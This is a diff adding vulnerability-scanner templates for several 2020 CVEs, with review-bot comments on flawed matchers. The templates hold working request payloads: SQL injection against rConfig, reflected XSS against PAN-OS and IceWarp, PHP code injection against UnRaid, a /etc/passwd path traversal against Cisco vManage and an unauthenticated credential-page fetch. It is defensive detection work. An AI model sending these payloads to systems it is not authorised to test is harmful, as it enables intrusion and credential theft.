diff --git a/cves/2020/CVE-2020-10546.yaml b/cves/2020/CVE-2020-10546.yaml
new file mode 100644
index 0000000000..c78d679292
--- /dev/null
+++ b/cves/2020/CVE-2020-10546.yaml
@@ -0,0 +1,21 @@
+id: CVE-2020-10546
+info:
+ name: rConfig 3.9.4 SQLi
+ author: madrobot
+ severity: high
+ reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10546
+ tags: SQLI
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/compliancepolicies.inc.php?search=True&searchColumn=policyName&searchOption=contains&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL+--+"
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - "[project-discovery]"
+ part: body
diff --git a/cves/2020/CVE-2020-10547.yaml b/cves/2020/CVE-2020-10547.yaml
new file mode 100644
index 0000000000..b5ef60e413
--- /dev/null
+++ b/cves/2020/CVE-2020-10547.yaml
@@ -0,0 +1,21 @@
+id: CVE-2020-10547
+info:
+ name: rConfig 3.9.4 SQLi
+ author: madrobot
+ severity: high
+ reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10547
+ tags: SQLI
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/compliancepolicyelements.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL+--+&searchColumn=elementName&searchOption=contains"
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - "[project-discovery]"
+ part: body
diff --git a/cves/2020/CVE-2020-10548.yaml b/cves/2020/CVE-2020-10548.yaml
new file mode 100644
index 0000000000..6805f02882
--- /dev/null
+++ b/cves/2020/CVE-2020-10548.yaml
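Review bot: The hex literal in the `searchField` value of CVE-2020-10546.yaml is undocumented, so a maintainer cannot tell from the template why the word matcher looks for `[project-discovery]`; the same applies to CVE-2020-10547, CVE-2020-10548 and CVE-2020-10549. The literal decodes to `"><BR>[project-discovery]`, and because it is sent hex-encoded the marker should only appear in the body when the database evaluated it, which keeps a page that merely echoes the query string from matching. I would add a comment above `path:` such as `# hex literal decodes to "><BR>[project-discovery]; the marker appears only if the UNION was evaluated`, and a `description:` under `info:` naming the affected script and parameter. The four `info` blocks also share the identical `name: rConfig 3.9.4 SQLi`, so results can only be told apart by id; including the script name in `name` would fix that.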
@@ -0,0 +1,21 @@
+id: CVE-2020-10548
+info:
+ name: rConfig 3.9.4 SQLi
+ author: madrobot
+ severity: high
+ reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10548
+ tags: SQLI
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/devices.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+--+&searchColumn=n.id&searchOption=contains"
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - "[project-discovery]"
+ part: body
diff --git a/cves/2020/CVE-2020-10549.yaml b/cves/2020/CVE-2020-10549.yaml
new file mode 100644
index 0000000000..8bb8758eea
--- /dev/null
+++ b/cves/2020/CVE-2020-10549.yaml
@@ -0,0 +1,21 @@
+id: CVE-2020-10549
+info:
+ name: rConfig 3.9.4 SQLi
+ author: madrobot
+ severity: high
+ reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10549
+ tags: SQLI
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/snippets.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL+--+&searchColumn=snippetName&searchOption=contains"
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - "[project-discovery]"
+ part: body
diff --git a/cves/2020/CVE-2020-2036.yaml b/cves/2020/CVE-2020-2036.yaml
new file mode 100644
index 0000000000..e32111801e
--- /dev/null
+++ b/cves/2020/CVE-2020-2036.yaml
@@ -0,0 +1,21 @@
+id: CVE-2020-2036
+info:
+ name: Palo Alto Networks Reflected Cross Site Scripting
+ author: madrobot
+ severity: medium
+ reference: https://swarm.ptsecurity.com/swarm-of-palo-alto-pan-os-vulnerabilities/
+ tags: XSS
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/unauth/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E"
+ - "{{BaseURL}}/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E"
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - ""
+ part: body
diff --git a/cves/2020/CVE-2020-27982.yaml b/cves/2020/CVE-2020-27982.yaml
new file mode 100644
index 0000000000..86269505f8
--- /dev/null
+++ b/cves/2020/CVE-2020-27982.yaml
@@ -0,0 +1,21 @@
+id: CVE-2020-27982
+info:
+ name: IceWarp WebMail Reflected XSS
+ author: madrobot
+ severity: medium
+ reference: https://packetstormsecurity.com/files/159763/Icewarp-WebMail-11.4.5.0-Cross-Site-Scripting.html
+ tags: XSS
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/webmail/?language=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E"
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - ""
+ part: body
diff --git a/cves/2020/CVE-2020-5847.yaml b/cves/2020/CVE-2020-5847.yaml
new file mode 100644
index 0000000000..fb1a3eceb8
--- /dev/null
+++ b/cves/2020/CVE-2020-5847.yaml
@@ -0,0 +1,21 @@
+id: CVE-2020-5847
+info:
+ name: UnRaid Remote Code Execution
+ author: madrobot
+ severity: high
+ reference: https://sysdream.com/news/lab/2020-02-06-cve-2020-5847-cve-2020-5849-unraid-6-8-0-unauthenticated-remote-code-execution-as-root/
+ tags: Directory Traversal
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/webGui/images/green-on.png/?path=x&site[x][text]=%3C?php%20phpinfo();%20?%3E"
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - "http://www.php.net/"
+ part: body
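Review bot: The word matcher in CVE-2020-2036.yaml, and the one in CVE-2020-27982.yaml, contains only the empty string `""`, which is found in every body, so as written any 200 response on these paths would be reported as XSS. The intended word was presumably the decoded payload and may have been lost when this page was rendered; either way the matcher should name the reflected markup explicitly. A header matcher should also confirm the response is served as `text/html`, since markup reflected in JSON or plain text is not executed by a browser. The sketch below shows the matcher list for CVE-2020-2036; CVE-2020-27982 needs the same change with its own decoded string, `"><img src=x onerror=alert(1)>`.

```yaml
    matchers:
      # … unchanged: status 200 matcher …
      - type: word
        words:
          - '"><svg/onload=alert(1)>'
        part: body
      - type: word
        words:
          - "text/html"
        part: header
```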
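Review bot: The body matcher `http://www.php.net/` in CVE-2020-5847.yaml is a weak signal for code execution, since any page that merely links to php.net and returns 200 would match. Requiring strings specific to phpinfo() output together, for example `- "PHP Extension"` and `- "PHP Version"` with `condition: and` on the word matcher, would tie the finding to the injected call having actually run. The `tags: Directory Traversal` value also contradicts the template name, which describes remote code execution; `tags: rce` would describe it correctly.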
diff --git a/cves/2020/CVE-2020-9425.yaml b/cves/2020/CVE-2020-9425.yaml
new file mode 100644
index 0000000000..45825b279d
--- /dev/null
+++ b/cves/2020/CVE-2020-9425.yaml
@@ -0,0 +1,22 @@
+id: CVE-2020-9425
+info:
+ name: rConfig Unauthenticated Sensitive Information Disclosure
+ author: madrobot
+ severity: high
+ reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9425
+ tags: Information Disclosure
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/settings.php"
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - "defaultNodeUsername"
+ - "defaultNodePassword"
+ part: body
diff --git a/cves/2020/CVE-2020–26073.yaml b/cves/2020/CVE-2020–26073.yaml
new file mode 100644
index 0000000000..3b06a803ef
--- /dev/null
+++ b/cves/2020/CVE-2020–26073.yaml
@@ -0,0 +1,21 @@
+id: CVE-2020–26073
+info:
+ name: Cisco SD-WAN vManage Software Directory Traversal
+ author: madrobot
+ severity: high
+ reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020–26073
+ tags: Directory Traversal
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fpasswd"
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: regex
+ words:
+ - "root:[x*]:0:0:"
+ part: body
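Review bot: The two words `defaultNodeUsername` and `defaultNodePassword` in CVE-2020-9425.yaml are combined with the word matcher's default `or`, because `matchers-condition: and` only joins the status and word matchers and does not apply inside the `words` list. A page that mentions just one of the field names would therefore be reported; adding `condition: and` to the word matcher requires both. The template also lacks a `description:` stating that a match means `settings.php` was returned without authentication, which is what a triager needs to confirm.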
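Review bot: The last matcher in CVE-2020–26073.yaml is declared `type: regex` but lists its pattern under `words:`; a regex matcher reads its patterns from `regex:`, so as written the `root:[x*]:0:0:` pattern is presumably never evaluated. The id, the file name and the reference URL also use an en dash (`CVE-2020–26073`) instead of an ASCII hyphen, which breaks the reference link and any lookup or filter by CVE id. I would change these to `id: CVE-2020-26073`, `reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26073` and `regex:` in place of `words:`, and rename the file to match.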